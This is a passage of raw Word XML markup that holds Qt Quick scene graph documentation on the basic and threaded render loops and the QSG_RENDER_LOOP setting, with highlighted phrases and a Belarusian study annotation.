          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Out of these,</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, while</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">performs scene graph rendering on a </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dedicated thread</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Qt attempts to choose a suitable loop based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>platform and possibly the graphics drivers in use</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. When this is not satisfactory, or for testing purposes, the environment variable</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDER_LOOP</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be used to force the usage of a given loop. To verify which render loop is in use, enable the</w:t>
      </w:r>
      <w:r w:rsidR="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt.scenegraph.general</w:t>
      </w:r>
      <w:r w:rsidR="004F7B6E" w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2007" w:history="1">
        <w:r w:rsidRPr="004F7B6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>logging category</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="0011590B" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7B6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">render </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loops rely on the OpenGL implementation for throttling by requesting a swap interval of 1</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some graphics drivers allow</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users to override this setting and turn it off, ignoring Qt's request. Without blocking in the swap buffers operation (or elsewhere), the render loop will run animations too fast and spin the CPU at 100%. If a system is known to be unable to provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsync-based throttling</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, use the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>basic</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render loop instead by setting</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDER_LOOP=basic</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the environment.</w:t>
      </w:r>
      <w:r w:rsidR="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0011590B" w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00296651" w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Лепей зразумець дадзеную праблему, злучаную з графікай.</w:t>
      </w:r>
      <w:r w:rsidR="0011590B" w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="00974C4A" w:rsidRDefault="001113FB" w:rsidP="0011590B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1637" w:name="threaded-render-loop-threaded"/>
      <w:bookmarkStart w:id="1638" w:name="_Toc483000886"/>
      <w:bookmarkStart w:id="1639" w:name="_Toc483003877"/>
      <w:bookmarkStart w:id="1640" w:name="_Toc483604230"/>
      <w:bookmarkStart w:id="1641" w:name="_Toc483605450"/>
      <w:bookmarkEnd w:id="1637"/>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Render</w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Loop</w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("</w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1638"/>
      <w:bookmarkEnd w:id="1639"/>
      <w:bookmarkEnd w:id="1640"/>
      <w:bookmarkEnd w:id="1641"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On many</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> configurations, the </w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph rendering will happen</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dedicated render thread</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>done to increase parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of multi-core processors and make better use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stall times such as waiting for a blocking swap buffer call</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offers significant performance improvements</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00296651">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">imposes certain restrictions </w:t>
      </w:r>
      <w:r w:rsidRPr="0011590B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on where and when interaction with the scene graph can happen</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
